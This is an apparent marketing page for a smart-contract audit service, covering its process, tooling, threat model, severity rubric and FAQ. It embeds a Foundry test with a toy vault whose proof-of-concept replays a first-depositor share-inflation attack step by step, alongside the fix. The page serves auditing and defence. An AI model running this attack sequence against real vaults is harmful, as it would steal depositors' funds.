A senior-led, four-stage process backed by industry-leading static, dynamic, fuzzing, and formal-verification tooling — and line-by-line manual review by engineers who have shipped production audits for protocols securing over $1B in TVL.
No black boxes. Every Vibranium engagement follows the same disciplined workflow, with named senior auditors accountable from kick-off to final report.
Stage 1: We read your repo, model the threat surface, and agree the audit scope in writing.
Stage 2: Two senior engineers review every line. Static analysis, fuzzing and formal verification run in parallel.
Stage 3: You receive a written preliminary report with every finding classified, ranked and reproducible.
Stage 4: We review your fixes commit-by-commit and issue the publicly verifiable final report.
Tools find shallow bugs fast so our senior engineers can focus their time on the deep architectural ones machines miss. Here is the complete kit that ships with every engagement.
Slither: industry-standard Solidity static analyzer. 90+ detectors for reentrancy, access-control, arithmetic, and inheritance bugs.
Symbolic execution of EVM bytecode. Catches integer overflow (pre-0.8 arithmetic and unchecked blocks), unchecked external calls, and unprotected selfdestruct (the opcode's deprecated name is suicide, which is how some tools still report it).
Rust-based static analyzer with rapid CI integration. Complements Slither with newer detector classes.
Property-based fuzzer for Solidity invariants. We write protocol-specific properties and run millions of randomised transactions.
Foundry invariant testing: stateful invariant fuzzing with custom handlers. Native to your repo, so findings ship as reproducible Forge tests.
Halmos: symbolic testing for Foundry. Proves selected invariants hold for every input within the bounds it explores (loop and call-depth limits), not just the ones a fuzzer happens to guess.
Certora: industry-grade formal verification for safety-critical protocols. Used selectively where mathematical proofs add value over fuzzing.
Two senior engineers reading every line, every branch, every state transition. No tool replaces a human who has shipped production audits.
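To show how a fuzzed invariant becomes the reproducible Forge test a report ships with, here is an added example written for this page; it is not Vibranium's tooling or any client's contract. It targets the first-depositor share-inflation bug listed under High severity in the rubric below. Everything in it is constructed: the ToyVault contract, its donate() stand-in for a direct token transfer into the vault, the 1 wei / 1e18 / 1e18 attack amounts, and the 6-decimal virtual offset used to show the OpenZeppelin-style mitigation. It assumes a Foundry project with forge-std installed.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

import {Test} from "forge-std/Test.sol";
import {StdUtils} from "forge-std/StdUtils.sol";

/// Toy share vault constructed for this example (not production code). Assets are plain
/// accounting rather than an ERC-20 so the test needs no token; donate() stands in for a
/// direct token transfer that raises totalAssets without minting shares.
contract ToyVault {
    // 0 => naive accounting (vulnerable). 10**offset => OpenZeppelin-style virtual
    // shares/assets offset, which makes inflating the share price unprofitable.
    uint256 public immutable virtualShares;
    uint256 public totalSupply;
    uint256 public totalAssets;
    mapping(address => uint256) public balanceOf;

    constructor(uint256 _virtualShares) { virtualShares = _virtualShares; }

    function convertToShares(uint256 assets) public view returns (uint256) {
        if (virtualShares == 0) return totalSupply == 0 ? assets : assets * totalSupply / totalAssets;
        return assets * (totalSupply + virtualShares) / (totalAssets + 1);
    }

    function convertToAssets(uint256 shares) public view returns (uint256) {
        if (virtualShares == 0) return totalSupply == 0 ? 0 : shares * totalAssets / totalSupply;
        return shares * (totalAssets + 1) / (totalSupply + virtualShares);
    }

    function deposit(uint256 assets) external returns (uint256 shares) {
        shares = convertToShares(assets); // priced before the totals move
        totalAssets += assets;
        totalSupply += shares;
        balanceOf[msg.sender] += shares;
    }

    function redeem(uint256 shares) external returns (uint256 assets) {
        require(balanceOf[msg.sender] >= shares, "insufficient shares");
        assets = convertToAssets(shares);
        balanceOf[msg.sender] -= shares;
        totalSupply -= shares;
        totalAssets -= assets;
    }

    function donate(uint256 assets) external { totalAssets += assets; }
}

/// Fuzz handler: the invariant runner calls these with random arguments, so the vault sees
/// arbitrary interleavings of deposits and donations. The violation is latched so the
/// invariant function can assert on it after every call in the sequence.
contract Handler is StdUtils {
    ToyVault public vault;
    bool public zeroShareDeposit; // set when a positive deposit mints no shares

    constructor(ToyVault _vault) { vault = _vault; }

    function deposit(uint256 assets) external {
        if (vault.deposit(bound(assets, 1, 1e24)) == 0) zeroShareDeposit = true;
    }

    function donate(uint256 assets) external { vault.donate(bound(assets, 1, 1e24)); }
}

contract VaultInflationTest is Test {
    ToyVault vault;
    Handler handler;

    function setUp() public {
        vault = new ToyVault(0); // the naive configuration is the one under fuzz
        handler = new Handler(vault);
        targetContract(address(handler));
    }

    /// Protocol property: a positive deposit always mints at least one share. Against
    /// ToyVault(0), `forge test --match-test invariant_` fails and prints the
    /// deposit/donate/deposit sequence that breaks it; runAttack() replays that sequence.
    function invariant_positiveDepositMintsShares() public {
        assertFalse(handler.zeroShareDeposit(), "positive deposit minted zero shares");
    }

    /// Attacker seeds 1 wei, donates 1e18, victim deposits 1e18, attacker redeems.
    function runAttack(ToyVault v) internal returns (uint256 victimShares, uint256 recovered) {
        address attacker = makeAddr("attacker");
        vm.startPrank(attacker);
        uint256 attackerShares = v.deposit(1);
        v.donate(1e18);
        vm.stopPrank();
        vm.prank(makeAddr("victim"));
        victimShares = v.deposit(1e18);
        vm.prank(attacker);
        recovered = v.redeem(attackerShares);
    }

    /// The reproducible PoC that would accompany a High finding against the naive vault.
    function test_poc_firstDepositorInflation() public {
        (uint256 victimShares, uint256 recovered) = runAttack(vault);
        assertEq(victimShares, 0, "1e18 * 1 / (1e18 + 1) rounds down to zero shares");
        assertEq(recovered, 2e18 + 1, "attacker's single share redeems the whole vault");
    }

    /// Same sequence against a 6-decimal virtual offset: the victim is credited shares and
    /// the attacker recovers less than the 1e18 + 1 they spent.
    function test_virtualOffsetDefeatsInflation() public {
        (uint256 victimShares, uint256 recovered) = runAttack(new ToyVault(1e6));
        assertGt(victimShares, 0, "offset vault minted zero shares");
        assertLt(recovered, 1e18 + 1, "inflation attack was profitable");
    }
}
```

Run `forge test` in a project with forge-std installed: the invariant fails against the naive vault and prints the call sequence, while the two unit tests pin down the vulnerable and hardened behaviour deterministically. The exact offset is a tuning choice for the protocol; the transferable piece is the property the handler latches, which is the shape a protocol-specific invariant takes in a real ERC-4626 review.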
Before a single line is reviewed, we build an explicit model of who can attack what. Findings without a credible attacker are noise.
Any unauthenticated address calling public functions. We map every entry point, parameter constraint, and state-change side-effect.
Owner, admin, governance, multisig, and time-locked roles. What can each role do today, and what could they do if compromised?
How the protocol behaves when called by other contracts: flash loans, callbacks, reentrancy across pools, oracle manipulation, MEV.
Liquidation cascades, fee griefing, sandwich-resistance, donation attacks, share-inflation, just-in-time liquidity. Solidity-clean ≠ economically safe.
Storage-slot collisions, initializer races, proxy-implementation drift, migration replay. Upgradeable systems get a dedicated review pass.
Oracles, keepers, relayers, signers, bridges. Anything off-chain is a trust assumption that must be made explicit in the report.
Every finding is classified using a transparent rubric mapped to industry references: the SWC Registry for weakness IDs (no longer actively maintained, but still the common vocabulary), the OWASP Smart Contract Top 10, and CVSS-adapted impact scoring.
| Severity | Impact + Likelihood | Typical Examples |
|---|---|---|
| CRITICAL | Direct loss of user or protocol funds. Exploitable by any external attacker without privileged access. High likelihood. | Reentrancy draining vaults, signature replay, unauthorised mint, broken access control on privileged functions, oracle manipulation enabling free liquidations. |
| HIGH | Loss of funds under realistic conditions, or full DoS of core protocol functionality. Requires specific but plausible state. | Storage-slot collision in upgradeable proxy, share-inflation on first deposit, missing slippage protection, donation attacks on ERC-4626, broken pause guards. |
| MEDIUM | Partial fund loss, predictable griefing, or loss of yield. Either bounded impact or requires a privileged actor to misbehave. | Fee griefing, front-running of legitimate user actions, integer truncation rounding in user's favour, incorrect event emission breaking off-chain indexers. |
| LOW | Minor deviation from spec with negligible direct user impact. Best-practice failure. | Missing zero-address checks, unused storage variables, view functions unguarded against read-only reentrancy where no on-chain consumer acts on the stale value (escalated when another contract's accounting reads it). |
| INFORMATIONAL | Code quality, gas optimisation, NatSpec, naming. No security impact. | Style inconsistencies, missing NatSpec, gas savings via custom errors, recommendations for upgrading Solidity version. |
Every finding in a Vibranium report follows this exact structure — so your engineers can reproduce, fix, and verify each issue with zero ambiguity.
Exact deliverables — no surprises, no upsells.
Written PDF after Stage 2, before any fixes. All findings classified.
Public PDF with fix verification status, hosted on our CDN and yours.
Embeddable badge with your security score, linking to the published report.
Reproducible Forge tests for every Critical/High finding.
30 minutes with the audit lead to talk you through every finding.
Post-audit access to the audit team for follow-up questions, included.
The questions protocol CTOs actually ask us before signing.
Named senior engineers with 4+ years of Solidity audit experience. Every engagement is staffed with two senior auditors as primary reviewers. We never use unsupervised juniors and we never use offshore review mills.
1,000–3,000 LOC: 1–2 weeks. 3,000–8,000 LOC: 2–4 weeks. 8,000+ LOC or complex DeFi primitives: 4–8 weeks. Emergency audits with 48-hour turnaround are available at a premium — contact us.
We use LLMs as a triage layer on top of static analysis output to reduce noise, never as the primary reviewer. No finding ships in a report unless a named senior engineer has independently verified it with a reproducible PoC. AI is a force multiplier for our team, not a substitute.
No auditor — us, Trail of Bits, OpenZeppelin, Certora — can offer a zero-bug guarantee. What we offer is a transparent process, named-engineer accountability, 30 days of post-audit Q&A, and a discounted re-audit if a Critical issue is discovered in the audited scope within 90 days.
Reports are public by default: every Vibranium report is published as a public PDF after fix verification, because that public verifiability is the whole point. We accept NDA-only engagements at a premium, but we strongly recommend public reports because they compound your protocol's security reputation.
We use formal verification selectively. Halmos and Certora are excellent for safety-critical primitives (AMM math, lending accounting, share accounting in vaults) where mathematical proofs add real value over fuzzing. We don't pretend FV is appropriate for every contract; that would be expensive theatre.
We also audit beyond Solidity: Rust (Solana, NEAR, CosmWasm, Substrate), Move (Aptos, Sui), Vyper, Cairo (StarkNet), and several Layer-1 native VMs. See our 22+ chains coverage in the homepage stats.
Senior-led audit. Public report. Named team. No black boxes.